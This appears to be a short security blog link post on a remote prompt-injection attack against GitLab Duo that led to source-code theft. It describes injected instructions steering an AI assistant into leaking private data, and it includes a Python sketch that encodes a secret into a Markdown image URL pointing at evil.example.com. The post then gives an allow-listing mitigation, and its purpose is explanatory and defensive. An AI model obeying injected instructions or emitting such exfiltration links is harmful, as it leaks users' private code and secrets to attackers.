Remote Prompt Injection in GitLab Duo Leads to Source Code Theft
Yet another LLM prompt-injection/exfiltration attack. As always: "if your LLM system combines access to private data, exposure to malicious instructions and the ability to exfiltrate information (through tool use or through rendering links and images) you have a nasty security hole."
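To make the "rendering links and images" exfiltration channel concrete, here's a minimal sketch (all names hypothetical, not taken from the GitLab Duo write-up): if a chat UI renders model output as Markdown, injected instructions can make the model emit an image whose URL smuggles private data out to an attacker-controlled server the moment the browser fetches it.

```python
import urllib.parse


def build_exfil_image_markdown(stolen_text: str, attacker_host: str) -> str:
    """Encode stolen data into the query string of an image URL.

    If the chat UI renders this Markdown, the user's browser fetches
    the "image" and delivers the data to the attacker's server --
    no tool use required, just image rendering.
    """
    payload = urllib.parse.quote(stolen_text)
    return f"![loading](https://{attacker_host}/pixel.png?d={payload})"


md = build_exfil_image_markdown("SECRET_API_KEY=abc123", "evil.example.com")
print(md)
```

The standard mitigation is to refuse to render images (or links) pointing at arbitrary external domains in LLM output, allow-listing only trusted hosts.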
Tags: llms security infosec holes exploits prompt-injection exfiltration gitlab pull-requests